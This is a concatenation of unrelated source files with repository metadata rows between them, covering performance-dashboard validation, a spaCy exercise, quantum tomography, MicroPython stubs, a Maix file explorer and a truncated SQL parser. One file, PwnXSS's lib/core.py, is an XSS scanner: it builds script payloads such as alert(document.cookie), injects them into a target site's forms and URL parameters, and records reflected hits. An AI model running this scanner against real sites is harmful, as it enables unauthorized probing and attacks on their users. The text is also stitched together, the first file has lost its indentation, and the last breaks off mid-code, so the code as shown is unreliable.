"""Makes a mapping from test paths to last added revision."""
last_added_revision_keys = []
for row in row_dicts:
if not ('master' in row and 'bot' in row and 'test' in row):
continue
path = '%s/%s/%s' % (row['master'], row['bot'], row['test'].strip('/'))
if len(path) > _MAX_TEST_PATH_LENGTH:
continue
last_added_revision_keys.append(ndb.Key('LastAddedRevision', path))
try:
last_added_revision_entities = ndb.get_multi(last_added_revision_keys)
except datastore_errors.BadRequestError:
# TODO(qyearsley): Add test coverage. See catapult:#1346.
logging.warn('Datastore BadRequestError when getting %s',
repr(last_added_revision_keys))
return {}
return {r.key.string_id(): r.revision
for r in last_added_revision_entities if r is not None}
def _ValidateRowDict(row, test_map):
"""Checks all fields in the input dictionary.
Args:
row: A dictionary which represents one point.
test_map: A dictionary mapping test paths to last added revision.
Raises:
BadRequestError: The input was not valid.
"""
required_fields = ['master', 'bot', 'test']
for field in required_fields:
if field not in row:
raise BadRequestError('No "%s" field in row dict.' % field)
_ValidateMasterBotTest(row['master'], row['bot'], row['test'])
_ValidateRowId(row, test_map)
GetAndValidateRowProperties(row)
def _ValidateMasterBotTest(master, bot, test):
"""Validates the master, bot, and test properties of a row dict."""
# Trailing and leading slashes in the test name are ignored.
# The test name must consist of at least a test suite plus sub-test.
test = test.strip('/')
if '/' not in test:
raise BadRequestError('Test name must have more than one part.')
if len(test.split('/')) > graph_data.MAX_TEST_ANCESTORS:
raise BadRequestError('Invalid test name: %s' % test)
# The master and bot names have just one part.
if '/' in master or '/' in bot:
raise BadRequestError('Illegal slash in master or bot name.')
_ValidateTestPath('%s/%s/%s' % (master, bot, test))
def _ValidateTestPath(test_path):
"""Checks whether all the parts of the test path are valid."""
# A test with a test path length over the max key length shouldn't be
# created, since the test path is used in TestContainer keys.
if len(test_path) > _MAX_TEST_PATH_LENGTH:
raise BadRequestError('Test path too long: %s' % test_path)
# Stars are reserved for test path patterns, so they can't be used in names.
if '*' in test_path:
raise BadRequestError('Illegal asterisk in test name.')
for name in test_path.split('/'):
_ValidateTestPathPartName(name)
def _ValidateTestPathPartName(name):
"""Checks whether a Master, Bot or TestMetadata name is OK."""
# NDB Datastore doesn't allow key names to start and with "__" and "__".
if name.startswith('__') and name.endswith('__'):
raise BadRequestError(
'Invalid name: "%s". Names cannot start and end with "__".' % name)
def _ValidateRowId(row_dict, test_map):
"""Checks whether the ID for a Row is OK.
Args:
row_dict: A dictionary with new point properties, including "revision".
test_map: A dictionary mapping test paths to the last previously added
revision for each test.
Raises:
BadRequestError: The revision is not acceptable for some reason.
"""
row_id = GetAndValidateRowId(row_dict)
# Get the last added revision number for this test.
master, bot, test = row_dict['master'], row_dict['bot'], row_dict['test']
test_path = '%s/%s/%s' % (master, bot, test)
last_row_id = test_map.get(test_path)
if not last_row_id:
# Could be first point in test.
logging.warning('Test %s has no last added revision entry.', test_path)
return
allow_jump = (
master.endswith('Internal') or
(master.endswith('QA') and bot.startswith('release-tests-')))
if not _IsAcceptableRowId(row_id, last_row_id, allow_jump=allow_jump):
raise BadRequestError(
'Invalid ID (revision) %d; compared to previous ID %s, it was larger '
'or smaller by too much.' % (row_id, last_row_id))
def _IsAcceptableRowId(row_id, last_row_id, allow_jump=False):
"""Checks whether the given row id (aka revision) is not too large or small.
For each data series (i.e. TestMetadata entity), we assume that row IDs are
monotonically increasing. On a given chart, points are sorted by these
row IDs. This way, points can arrive out of order but still be shown
correctly in the chart.
However, sometimes a bot might start to use a different *type* of row ID;
for example it might change from revision numbers or build numbers to
timestamps, or from timestamps to build numbers. This causes a lot of
problems, including points being put out of order.
If a sender of data actually wants to switch to a different type of
row ID, it would be much cleaner for them to start sending it under a new
chart name.
Args:
row_id: The proposed Row entity id (usually sent as "revision")
last_row_id: The previous Row id, or None if there were none previous.
Returns:
True if acceptable, False otherwise.
"""
if last_row_id is None:
# TODO(qyearsley): Add test coverage. See catapult:#1346.
return True
if row_id <= 0:
# TODO(qyearsley): Add test coverage. See catapult:#1346.
return False
# Too big of a decrease.
if row_id < 0.5 * last_row_id:
return False
# TODO(perezju): We temporarily allow for a big jump on special cased bots,
# while we migrate from using commit position to timestamp as row id.
# The jump is only allowed into a timestamp falling within Aug-Dec 2016.
# This special casing should be removed after finishing the migration.
if allow_jump and 1470009600 < row_id < 1483228800:
return True
# Too big of an increase.
if row_id > 2 * last_row_id:
return False
return True
def GetAndValidateRowId(row_dict):
"""Returns the integer ID for a new Row.
This method is also responsible for validating the input fields related
to making the new row ID.
Args:
row_dict: A dictionary obtained from the input JSON.
Returns:
An integer row ID.
Raises:
BadRequestError: The input wasn't formatted properly.
"""
if 'revision' not in row_dict:
raise BadRequestError('Required field "revision" missing.')
try:
return int(row_dict['revision'])
except (ValueError, TypeError):
raise BadRequestError('Bad value for "revision", should be numerical.')
def GetAndValidateRowProperties(row):
"""From the object received, make a dictionary of properties for a Row.
This includes the default "value" and "error" columns as well as all
supplemental columns, but it doesn't include "revision", and it doesn't
include input fields that are properties of the parent TestMetadata, such as
"units".
This method is responsible for validating all properties that are to be
properties of the new Row.
Args:
row: A dictionary obtained from the input JSON.
Returns:
A dictionary of the properties and property values to set when creating
a Row. This will include "value" and "error" as well as all supplemental
columns.
Raises:
BadRequestError: The properties weren't formatted correctly.
"""
columns = {}
# Value and error must be floating point numbers.
if 'value' not in row:
raise BadRequestError('No "value" given.')
try:
columns['value'] = float(row['value'])
except (ValueError, TypeError):
raise BadRequestError('Bad value for "value", should be numerical.')
if 'error' in row:
try:
error = float(row['error'])
columns['error'] = error
except (ValueError, TypeError):
logging.warn('Bad value for "error".')
columns.update(_GetSupplementalColumns(row))
return columns
def _GetSupplementalColumns(row):
"""Gets a dict of supplemental columns.
If any columns are invalid, a warning is logged and they just aren't included,
but no exception is raised.
Individual rows may specify up to _MAX_NUM_COLUMNS extra data, revision,
and annotation columns. These columns must follow formatting rules for
their type. Invalid columns are dropped with an error log, but the valid
data will still be graphed.
Args:
row: A dict, possibly with the key "supplemental_columns", the value of
which should be a dict.
Returns:
A dict of valid supplemental columns.
"""
columns = {}
for (name, value) in row.get('supplemental_columns', {}).iteritems():
# Don't allow too many columns
if len(columns) == _MAX_NUM_COLUMNS:
logging.warn('Too many columns, some being dropped.')
break
value = _CheckSupplementalColumn(name, value)
if value:
columns[name] = value
return columns
def _CheckSupplementalColumn(name, value):
"""Returns a possibly modified value for a supplemental column, or None."""
# Check length of column name.
name = str(name)
if len(name) > _MAX_COLUMN_NAME_LENGTH:
logging.warn('Supplemental column name too long.')
return None
# The column name has a prefix which indicates type of value.
if name[:2] not in ('d_', 'r_', 'a_'):
logging.warn('Bad column name "%s", invalid prefix.', name)
return None
# The d_ prefix means "data column", intended to hold numbers.
if name.startswith('d_'):
try:
value = float(value)
except (ValueError, TypeError):
logging.warn('Bad value for column "%s", should be numerical.', name)
return None
# The r_ prefix means "revision", and the value should look like a number,
# a version number, or a git commit hash.
if name.startswith('r_'):
revision_patterns = [
r'^\d+$',
r'^\d+\.\d+\.\d+\.\d+$',
r'^[A-Fa-f0-9]{40}$',
]
if (not value or len(str(value)) > _STRING_COLUMN_MAX_LENGTH or
not any(re.match(p, str(value)) for p in revision_patterns)):
logging.warn('Bad value for revision column "%s".', name)
return None
value = str(value)
if name.startswith('a_'):
# Annotation column, should be a short string.
if len(str(value)) > _STRING_COLUMN_MAX_LENGTH:
logging.warn('Value for "%s" too long, max length is %d.',
name, _STRING_COLUMN_MAX_LENGTH)
return None
return value
| 34.455206 | 80 | 0.693921 | [
"BSD-3-Clause"
] | bopopescu/catapult-2 | dashboard/dashboard/add_point.py | 28,460 | Python |
import spacy
# 读取zh_core_web_md流程
nlp = spacy.load("zh_core_web_md")
# 处理文本
doc = nlp("两只老虎跑得快")
for token in doc:
print(token.text)
# 获取词符"老虎"的向量
laohu_vector = doc[2].vector
print(laohu_vector)
| 13.6 | 34 | 0.720588 | [
"MIT"
] | admariner/spacy-course | exercises/zh/solution_02_09.py | 252 | Python |
'''
Second example calculation from:
Smart, S. E., & Mazziotti, D. A. (2021). Lowering tomography costs in quantum simulation
with a symmetry projected operator basis. Physical Review A, 103(1), 012420.
https://doi.org/10.1103/PhysRevA.103.012420
Here we are simuatling a noisy quantum system using a tunable noise model provided from an actual quantum device, and comparing the tomography of the 2-RDM under the default and symmetry projected techniques with the ideal 2-RDM.
'''
import numpy as np
import sys
from math import pi
import qiskit.providers.aer.noise as noise
from noise_model.deconstruct import *
from hqca.hamiltonian import *
from hqca.instructions import *
from hqca.processes import *
from hqca.acse import *
from hqca.core import *
from hqca.core.primitives import *
from pyscf import gto
from hqca.transforms import *
from functools import partial
from hqca.tools import *
from hqca.state_tomography import *
np.set_printoptions(precision=3)
import qiskit
class Ins(Instructions):
def __init__(self,coeff):
self._gates =[[(coeff,),self._test]]
def _test(self,Q,coeff):
Q.si(0)
Q.Cx(1,0)
Q.Cx(2,1)
Q.Cx(3,2)
Q.Rx(3,coeff[0])
Q.Rx(1,coeff[1])
Q.Cx(3,2)
Q.Cx(2,1)
Q.Cx(1,0)
Q.Cx(3,2)
Q.Ry(3,coeff[2])
Q.Cx(3,2)
Q.s(0)
@property
def gates(self):
return self._gates
@gates.setter
def gates(self,a):
self._gates = a
def split_matrix(rdm):
N = rdm.rdm.shape[0]
R = int(np.sqrt(N))
nn = np.zeros(rdm.rdm.shape,dtype=np.complex_)
ne = np.zeros(rdm.rdm.shape,dtype=np.complex_)
ee = np.zeros(rdm.rdm.shape,dtype=np.complex_)
for i in range(N):
p,r = i//R,i%R
for j in range(N):
q,s = j//R,j%R
ind = tuple([p,q,r,s])
if len(set(ind))==2:
nn[i,j]=rdm.rdm[i,j]
elif len(set(ind))==3:
ne[i,j]=rdm.rdm[i,j]
elif len(set(ind))==4:
ee[i,j]=rdm.rdm[i,j]
return nn,ne,ee
n = 0
# generate mol object
mol = gto.Mole()
mol.atom=[['H',(0,0,0)],['H',(2.0,0,0)]]
mol.basis='sto-3g'
mol.spin=0
mol.build()
N = []
eig = []
norm = []
ham = MolecularHamiltonian(mol,transform=JordanWigner)
st = StorageACSE(ham)
qs = QuantumStorage()
qs0 = QuantumStorage()
pr = StandardProcess()
qs0.set_algorithm(st)
# set Nq, number of shots, and error strength
Nq = 4
Ns = 8192
error = 0.0
# qs0, ideal
# qs, noisy simulated
qs0.set_backend(
backend='statevector_simulator',
Nq=Nq,
Nq_ancilla=0,
num_shots=Ns,
provider='Aer')
qs.set_algorithm(st)
# can specify provider='IBMQ' and an appropriate backend if desired
qs.set_backend(
backend='qasm_simulator',
Nq=Nq,
num_shots=Ns,
provider='Aer')
nm = model_v2(scaling=error,name='./noise_model/110220_ibmq_bogota')
qs.set_noise_model(custom=True,
noise_model=nm)
tomo = []
tomo_sim = []
coefficients = np.load('./noise_model/coefficients.npy')
# runs the tomography in sets of 5...suited for particular constraints on quantum device access
# but can be easily modified
for q in range(5):
coeffs = coefficients[q*5:q*5+5,:]
for coeff in coeffs:
print(coeff)
# run 1
tomo0 = StandardTomography(qs0,verbose=False)
tomo0.generate(real=True,imag=True,
simplify=True,transform=JordanWigner,
method='gt',strategy='lf')
ins0 = Ins(coeff)
tomo0.set(ins0)
tomo1 = StandardTomography(qs,verbose=False)
tomo1.generate(real=True,imag=True,
simplify=True,transform=JordanWigner,
method='gt',strategy='lf')
ins = Ins(coeff)
tomo1.set(ins)
tomo2 = ReducedTomography(qs,verbose=False)
tomo2.generate(real=True,imag=True,
simplify=True,transform=JordanWigner,
method='gt',strategy='lf')
ins = Ins(coeff)
tomo2.set(ins)
tomo_sim.append(tomo0)
tomo.append(tomo1)
tomo.append(tomo2)
run_multiple(tomo[q*10:(q*10+10)],qs)
run_multiple(tomo_sim[q*5:(q*5+5)],qs0)
for item in tomo:
print(item.counts['ZZZZ'])
print('Constructing..')
for t in tomo:
t.construct(processor=pr)
for t in tomo_sim:
t.construct(processor=pr)
for i in range(len(coefficients)):
print(coefficients[i,:])
tomo0 = tomo_sim[i]
tomo1 = tomo[i*2]
tomo2 = tomo[i*2+1]
st.analysis(tomo0.rdm)
st.analysis(tomo1.rdm)
st.analysis(tomo2.rdm)
tomo0.rdm.contract()
tomo1.rdm.contract()
tomo2.rdm.contract()
e0 = np.linalg.eigvalsh(tomo0.rdm.rdm)
e1 = np.linalg.eigvalsh(tomo1.rdm.rdm)
e2 = np.linalg.eigvalsh(tomo2.rdm.rdm)
d01 = tomo0.rdm-tomo1.rdm
d02 = tomo0.rdm-tomo2.rdm
d12 = tomo1.rdm-tomo2.rdm
d01.contract()
d12.contract()
d02.contract()
N01 = np.linalg.norm(d01.rdm,ord='fro')
N02 = np.linalg.norm(d02.rdm,ord='fro')
N12 = np.linalg.norm(d12.rdm,ord='fro')
print('Difference D0-D1: {}'.format(N01))
print('Difference D0-D2: {}'.format(N02))
print('Difference D1-D2: {}'.format(N12))
norm.append([N01,N02,N12])
print('--- --- --- --- --- ---')
print('Frombenius norm of D01, D02, and D12 for each run')
norm = np.asmatrix(norm)
print(norm)
print('--- --- --- --- --- ---')
print(' average (std dev)')
for i,l in zip(range(norm.shape[1]),['D01','D02','D12']):
print('{}: {:.6f} {:.6f}'.format(l,np.average(norm[:,i]),np.std(norm[:,i])))
| 28.170854 | 229 | 0.616482 | [
"Apache-2.0"
] | damazz/HQCA | examples/r2021_pra_tomography/02_pra_example_2.py | 5,606 | Python |
from lib.helper.helper import *
from random import randint
from bs4 import BeautifulSoup
from urllib.parse import urljoin,urlparse,parse_qs,urlencode
from lib.helper.Log import *
class core:
@classmethod
def generate(self,eff):
FUNCTION=[
"prompt(5000/200)",
"alert(6000/3000)",
"alert(document.cookie)",
"prompt(document.cookie)",
"console.log(5000/3000)"
]
if eff == 1:
return "<script/>"+FUNCTION[randint(0,4)]+"<\script\>"
elif eff == 2:
return "<\script/>"+FUNCTION[randint(0,4)]+"<\\script>"
elif eff == 3:
return "<\script\> "+FUNCTION[randint(0,4)]+"<//script>"
elif eff == 4:
return "<script>"+FUNCTION[randint(0,4)]+"<\script/>"
elif eff == 5:
return "<script>"+FUNCTION[randint(0,4)]+"<//script>"
elif eff == 6:
return "<script>"+FUNCTION[randint(0,4)]+"</script>"
@classmethod
def post_method(self):
bsObj=BeautifulSoup(self.body,"html.parser")
forms=bsObj.find_all("form",method=True)
for form in forms:
try:
action=form["action"]
except KeyError:
action=self.url
if form["method"].lower().strip() == "post":
Log.warning("Target have form with POST method: "+C+urljoin(self.url,action))
Log.info("Collecting form input key.....")
keys={}
for key in form.find_all(["input","textarea"]):
try:
if key["type"] == "submit":
Log.info("Form key name: "+G+key["name"]+N+" value: "+G+"<Submit Confirm>")
keys.update({key["name"]:key["name"]})
else:
Log.info("Form key name: "+G+key["name"]+N+" value: "+G+self.payload)
keys.update({key["name"]:self.payload})
except Exception as e:
Log.info("Internal error: "+str(e))
Log.info("Sending payload (POST) method...")
req=self.session.post(urljoin(self.url,action),data=keys)
if self.payload in req.text:
Log.high("Detected XSS (POST) at "+urljoin(self.url,req.url))
file = open("xss.txt", "a")
file.write(str(req.url)+"\n\n")
file.close()
Log.high("Post data: "+str(keys))
else:
Log.info("Parameter page using (POST) payloads but not 100% yet...")
@classmethod
def get_method_form(self):
bsObj=BeautifulSoup(self.body,"html.parser")
forms=bsObj.find_all("form",method=True)
for form in forms:
try:
action=form["action"]
except KeyError:
action=self.url
if form["method"].lower().strip() == "get":
Log.warning("Target have form with GET method: "+C+urljoin(self.url,action))
Log.info("Collecting form input key.....")
keys={}
for key in form.find_all(["input","textarea"]):
try:
if key["type"] == "submit":
Log.info("Form key name: "+G+key["name"]+N+" value: "+G+"<Submit Confirm>")
keys.update({key["name"]:key["name"]})
else:
Log.info("Form key name: "+G+key["name"]+N+" value: "+G+self.payload)
keys.update({key["name"]:self.payload})
except Exception as e:
Log.info("Internal error: "+str(e))
try:
Log.info("Form key name: "+G+key["name"]+N+" value: "+G+self.payload)
keys.update({key["name"]:self.payload})
except KeyError as e:
Log.info("Internal error: "+str(e))
Log.info("Sending payload (GET) method...")
req=self.session.get(urljoin(self.url,action),params=keys)
if self.payload in req.text:
Log.high("Detected XSS (GET) at "+urljoin(self.url,req.url))
file = open("xss.txt", "a")
file.write(str(req.url)+"\n\n")
file.close()
Log.high("GET data: "+str(keys))
else:
Log.info("\033[0;35;47m Parameter page using (GET) payloads but not 100% yet...")
@classmethod
def get_method(self):
bsObj=BeautifulSoup(self.body,"html.parser")
links=bsObj.find_all("a",href=True)
for a in links:
url=a["href"]
if url.startswith("http://") is False or url.startswith("https://") is False or url.startswith("mailto:") is False:
base=urljoin(self.url,a["href"])
query=urlparse(base).query
if query != "":
Log.warning("Found link with query: "+G+query+N+" Maybe a vuln XSS point")
query_payload=query.replace(query[query.find("=")+1:len(query)],self.payload,1)
test=base.replace(query,query_payload,1)
query_all=base.replace(query,urlencode({x: self.payload for x in parse_qs(query)}))
Log.info("Query (GET) : "+test)
Log.info("Query (GET) : "+query_all)
_respon=self.session.get(test)
if self.payload in _respon.text or self.payload in self.session.get(query_all).text:
Log.high("Detected XSS (GET) at "+_respon.url)
file = open("xss.txt", "a")
file.write(str(_respon.url)+"\n\n")
file.close()
else:
Log.info("Parameter page using (GET) payloads but not 100% yet...")
@classmethod
def main(self,url,proxy,headers,payload,cookie,method=2):
print(W+"*"*15)
self.payload=payload
self.url=url
self.session=session(proxy,headers,cookie)
Log.info("Checking connection to: "+Y+url)
try:
ctr=self.session.get(url)
self.body=ctr.text
except Exception as e:
Log.high("Internal error: "+str(e))
return
if ctr.status_code > 400:
Log.info("Connection failed "+G+str(ctr.status_code))
return
else:
Log.info("Connection estabilished "+G+str(ctr.status_code))
if method >= 2:
self.post_method()
self.get_method()
self.get_method_form()
elif method == 1:
self.post_method()
elif method == 0:
self.get_method()
self.get_method_form()
| 30.125 | 118 | 0.617716 | [
"MIT"
] | MohamedTarekq/PwnXSS | lib/core.py | 5,543 | Python |
# ----------------------------------------------------------------------------
# Imports:
# ----------------------------------------------------------------------------
from dpa.action import Action, ActionError
from dpa.ptask.action.sync import _PTaskSyncAction
from dpa.location import current_location_code
from dpa.shell.output import Style
# ----------------------------------------------------------------------------
# Classes:
# ----------------------------------------------------------------------------
class PTaskSourceAction(_PTaskSyncAction):
"""Source the contents of one ptask into another."""
# ------------------------------------------------------------------------
def execute(self):
try:
super(PTaskSourceAction, self).execute()
except ActionError as e:
raise ActionError("Unable to source ptask: " + str(e))
else:
print "\nSuccessfully sourced: ",
if self.source_version:
print Style.bright + str(self.source_version.spec) + \
Style.reset + "\n"
else:
print Style.bright + str(self.source.spec) + " [latest]" + \
Style.reset + "\n"
# ------------------------------------------------------------------------
def validate(self):
super(PTaskSourceAction, self).validate()
# ---- make sure the destination location is the current location.
cur_loc_code = current_location_code()
if self.destination_version:
dest_loc_code = self.destination_version.location_code
else:
dest_loc_code = self.destination_latest_version.location_code
if cur_loc_code != dest_loc_code:
raise ActionError("Destination location must be this location.")
| 36.4 | 78 | 0.467582 | [
"MIT"
] | Clemson-DPA/dpa-pipe | dpa/ptask/action/source.py | 1,820 | Python |
import os
import csv, json
from collections import defaultdict
from expertise.evaluators.mean_avg_precision import eval_map
from expertise.evaluators.hits_at_k import eval_hits_at_k
from expertise.dataset import Dataset
from expertise import utils
import ipdb
def setup(config):
assert os.path.exists(config.tpms_scores_file), 'This model requires a pre-computed tpms score file.'
dataset = Dataset(**config.dataset)
experiment_dir = os.path.abspath(config.experiment_dir)
setup_dir = os.path.join(experiment_dir, 'setup')
if not os.path.exists(setup_dir):
os.mkdir(setup_dir)
(train_set_ids,
dev_set_ids,
test_set_ids) = utils.split_ids(list(dataset.submission_ids), seed=config.random_seed)
bids_by_forum = utils.get_bids_by_forum(dataset)
test_labels = utils.format_bid_labels(test_set_ids, bids_by_forum)
utils.dump_jsonl(os.path.join(config.setup_dir, 'test_labels.jsonl'), test_labels)
def train(config):
print('Nothing to train. This model is a shell that reads in pre-computed TPMS scores.')
assert os.path.exists(config.tpms_scores_file), 'This model requires a pre-computed tpms score file.'
def infer(config):
print('Nothing to infer. This model is a shell that reads in pre-computed TPMS scores.')
assert os.path.exists(config.tpms_scores_file), 'This model requires a pre-computed tpms score file.'
def test(config):
score_file_path = os.path.join(config.test_dir, 'test_scores.jsonl')
labels_file_path = os.path.join(config.setup_dir, 'test_labels.jsonl')
tpms_scores_file = config.tpms_scores_file
scores = {}
for data in utils.jsonl_reader(tpms_scores_file):
source_id = data['source_id']
target_id = data['target_id']
score = data['score']
if source_id not in scores:
scores[source_id] = {}
if target_id not in scores[source_id]:
scores[source_id][target_id] = score
with open(score_file_path, 'w') as w:
for data in utils.jsonl_reader(labels_file_path):
paperid = data['source_id']
userid = data['target_id']
label = data['label']
if paperid in scores:
score = scores[paperid].get(userid, 0.0)
if float(score) > -float('inf'):
result = {
'source_id': paperid,
'target_id': userid,
'score': float(score),
'label': int(label)
}
w.write(json.dumps(result) + '\n')
(list_of_list_of_labels,
list_of_list_of_scores) = utils.load_labels(score_file_path)
map_score = float(eval_map(list_of_list_of_labels, list_of_list_of_scores))
hits_at_1 = float(eval_hits_at_k(list_of_list_of_labels, list_of_list_of_scores, k=1))
hits_at_3 = float(eval_hits_at_k(list_of_list_of_labels, list_of_list_of_scores, k=3))
hits_at_5 = float(eval_hits_at_k(list_of_list_of_labels, list_of_list_of_scores, k=5))
hits_at_10 = float(eval_hits_at_k(list_of_list_of_labels, list_of_list_of_scores, k=10))
score_lines = [
[config.name, text, data] for text, data in [
('MAP', map_score),
('Hits@1', hits_at_1),
('Hits@3', hits_at_3),
('Hits@5', hits_at_5),
('Hits@10', hits_at_10)
]
]
config.test_save(score_lines, 'test.scores.tsv')
| 36.052083 | 105 | 0.664259 | [
"MIT"
] | iesl/openreview-expertise | expertise/models/tpms/tpms.py | 3,461 | Python |
"""
Module: 'collections' on esp32 1.11.0
"""
# MCU: (sysname='esp32', nodename='esp32', release='1.11.0', version='v1.11 on 2019-05-29', machine='ESP32 module with ESP32')
# Stubber: 1.3.2
class OrderedDict:
''
def clear():
pass
def copy():
pass
def fromkeys():
pass
def get():
pass
def items():
pass
def keys():
pass
def pop():
pass
def popitem():
pass
def setdefault():
pass
def update():
pass
def values():
pass
class deque:
''
def append():
pass
def popleft():
pass
def namedtuple():
pass
| 12.555556 | 126 | 0.49115 | [
"MIT"
] | AssimilatedGuy/micropython-stubs | stubs/micropython-esp32-1_11/collections.py | 678 | Python |
from kivy.app import App
from kivy.uix.label import Label
class ChildApp(App):
def build(self):
return Label(text='Child')
if __name__ == '__main__':
ChildApp().run()
| 16.909091 | 34 | 0.666667 | [
"MIT"
] | hirossan4049/Schreen | tests/twokivys2.py | 186 | Python |
import os
import lcd
from Maix import GPIO
from board import board_info
from fpioa_manager import fm
# import uos
S_IFDIR = 0o040000 # directory
# noinspection PyPep8Naming
def S_IFMT(mode):
"""Return the portion of the file's mode that describes the
file type.
"""
return mode & 0o170000
# noinspection PyPep8Naming
def S_ISDIR(mode):
"""Return True if mode is from a directory."""
return S_IFMT(mode) == S_IFDIR
def sizeof_fmt(num, suffix='B'):
for unit in ['', 'K', 'M', 'G', 'T', 'P', 'E', 'Z']:
if abs(num) < 1024.0:
return "%3.1f%s%s" % (num, unit, suffix)
num /= 1024.0
return "%.1f%s%s" % (num, 'Yi', suffix)
class ExplorerApp:
def __init__(self):
self.current_offset = 0
self.current_selected_index = 0
self.__initialized = False
self.is_dirty = True;
def __lazy_init(self):
self.current_dir_files = os.listdir("/sd/")
print(self.current_dir_files)
self.__initialized = True
def on_top_button_changed(self, state):
if state == "pressed":
print("pressed")
self.current_selected_index += 1
if self.current_selected_index >= len(self.current_dir_files):
self.current_selected_index = 0
if self.current_selected_index >= 7:
self.current_offset = self.current_selected_index - 6
else:
self.current_offset = 0
print("current_selected=", self.current_selected_index,
"current_offset=", self.current_offset)
self.is_dirty = True
def on_draw(self):
self.is_dirty = False
if not self.__initialized:
self.__lazy_init()
x_offset = 4
y_offset = 6
lcd.clear()
for i in range(self.current_offset, len(self.current_dir_files)):
# gc.collect()
file_name = self.current_dir_files[i]
print(file_name)
try:
f_stat = os.stat('/sd/' + file_name)
if S_ISDIR(f_stat[0]):
file_name = file_name + '/'
# gc.collect()
file_readable_size = sizeof_fmt(f_stat[6])
lcd.draw_string(lcd.width() - 50, y_offset,
file_readable_size, lcd.WHITE, lcd.BLUE)
except Exception as e:
print("-------------------->", e)
is_current = self.current_selected_index == i
line = "%s %d %s" % ("->" if is_current else " ", i, file_name)
lcd.draw_string(x_offset, y_offset, line, lcd.WHITE, lcd.RED)
# gc.collect()
y_offset += 18
if y_offset > lcd.height():
print(y_offset, lcd.height(), "y_offset > height(), break")
break
lcd.init()
lcd.rotation(2) # Rotate the lcd 180deg
def test_irq(gpio, pin_num=None):
value = gpio.value()
state = "released" if value else "pressed"
print("key", gpio, state)
global app, key1, key2
if gpio is key2:
app.on_top_button_changed(state)
fm.register(board_info.BUTTON_A, fm.fpioa.GPIOHS21)
fm.register(board_info.BUTTON_B, fm.fpioa.GPIOHS22)
# fm.register(board_info.BUTTON_A, fm.fpioa.GPIOHS21, force=True)
key1=GPIO(GPIO.GPIOHS21, GPIO.IN, GPIO.PULL_UP)
key2=GPIO(GPIO.GPIOHS22, GPIO.IN, GPIO.PULL_UP)
key1.irq(test_irq, GPIO.IRQ_BOTH, GPIO.WAKEUP_NOT_SUPPORT, 7)
key2.irq(test_irq, GPIO.IRQ_BOTH, GPIO.WAKEUP_NOT_SUPPORT, 7)
app = ExplorerApp()
while True:
if app.is_dirty:
app.on_draw()
time.sleep_ms(1)
else:
time.sleep_ms(100)
| 31.478632 | 76 | 0.587293 | [
"Apache-2.0"
] | eggfly/M5StickVComputer | others/explorer_standalone.py | 3,683 | Python |
import numpy as np
def log_sum_exp(x, axis=-1):
a = x.max(axis=axis, keepdims=True)
out = a + np.log(np.sum(np.exp(x - a), axis=axis, keepdims=True))
return np.squeeze(out, axis=axis)
def kl_normal(qm, qv, pm, pv):
return 0.5 * np.sum(np.log(pv) - np.log(qv) + qv/pv +
np.square(qm - pm) / pv - 1, axis=-1)
def convert_to_ssl(x, y, n_labels, n_classes, complement=False):
if y.shape[-1] == n_classes:
y_sparse = y.argmax(1)
else:
y_sparse = y
x_label, y_label = [], []
if complement:
x_comp, y_comp = [], []
for i in xrange(n_classes):
idx = y_sparse == i
x_cand, y_cand = x[idx], y[idx]
idx = np.random.choice(len(x_cand), n_labels/n_classes, replace=False)
x_select, y_select = x_cand[idx], y_cand[idx]
x_label += [x_select]
y_label += [y_select]
if complement:
x_select, y_select = np.delete(x_cand, idx, 0), np.delete(y_cand, idx, 0)
x_comp += [x_select]
y_comp += [y_select]
x_label = np.concatenate(x_label, axis=0)
y_label = np.concatenate(y_label, axis=0)
if complement:
x_comp = np.concatenate(x_comp, axis=0)
y_comp = np.concatenate(y_comp, axis=0)
return x_label, y_label, x_comp, y_comp
else:
return x_label, y_label, x, y
def conv_shape(x, k, s, p, ceil=True):
if p == 'SAME':
output = float(x) / float(s)
elif p == 'VALID':
output = float(x - k + 1) / float(s)
else:
raise Exception('Unknown padding type')
if ceil:
return int(np.ceil(output))
else:
assert output.is_integer(), 'Does not satisfy conv int requirement'
return int(output)
def conv_shape_list(x, ksp_list, ceil=True):
x_list = [x]
for k, s, p in ksp_list:
x_list.append(conv_shape(x_list[-1], k, s, p, ceil))
return x_list
def split(arr, size):
for i in range(0, len(arr), size):
yield arr[i:i + size]
class FixedSeed:
def __init__(self, seed):
self.seed = seed
self.state = None
def __enter__(self):
self.state = np.random.get_state()
np.random.seed(self.seed)
def __exit__(self, exc_type, exc_value, traceback):
np.random.set_state(self.state)
| 31.202703 | 85 | 0.585535 | [
"MIT"
] | Hirokazu-Narui/tensorbayes | tensorbayes/nputils.py | 2,309 | Python |
from tytus.parser.team21.Analisis_Ascendente.Instrucciones.Expresiones.Expresion import Expresion
from tytus.parser.team21.Analisis_Ascendente.Instrucciones.expresion import Primitivo
from tytus.parser.team21.Analisis_Ascendente.Instrucciones.instruccion import Instruccion
from tytus.parser.team21.Analisis_Ascendente.storageManager.jsonMode import *
import tytus.parser.team21.Analisis_Ascendente.Tabla_simbolos.TablaSimbolos as TS
from datetime import date,datetime
todoBien = True
#INSERT INTO
class InsertInto(Instruccion):
def __init__(self,caso, id, listaId, values,fila,columna):
self.caso=caso
self.id = id
self.listaId = listaId
self.values = values
self.fila = fila
self.columna = columna
def ejecutar(insertinto,ts,consola,exceptions):
if ts.validar_sim("usedatabase1234") == 1:
# nombre de la bd
bdactual = ts.buscar_sim("usedatabase1234")
# se busca el simbolo y por lo tanto se pide el entorno de la bd
BD = ts.buscar_sim(bdactual.valor)
entornoBD = BD.Entorno
dataainsertar =[]
if entornoBD.validar_sim(insertinto.id) == 1:
simbolo_tabla = entornoBD.buscar_sim(insertinto.id)
entornoTabla = simbolo_tabla.Entorno
indices_a_buscar=[]
if insertinto.caso==1:
print("caso1")
for data in insertinto.listaId:
contador = 1
for columna in entornoTabla.simbolos:
if data.id == columna:
indices_a_buscar.append(contador)
break
contador=contador+1
print(indices_a_buscar)
lista = entornoTabla.simbolos
contador = 1
for columna in lista:
if not contador in indices_a_buscar:
print("((((((((((((((((((((((((((((((((((((((")
if "NOTNULL" in lista.get(columna).valor:
global todoBien
todoBien = False
consola.append(f"Error esta columna no puede ser nula {columna}")
break
else:
todoBien = True
contador=contador+1
for data in insertinto.listaId:
if entornoTabla.validar_sim(data.id)==-1:
consola.append(f"Error no hay coincidencia de ids en {data.id}")
todoBien = False
for data in insertinto.values:
print("val :",data.valor)
if todoBien:
contadoraux= 1
i = 0
todobien = True
for data in entornoTabla.simbolos:
if contadoraux in indices_a_buscar:
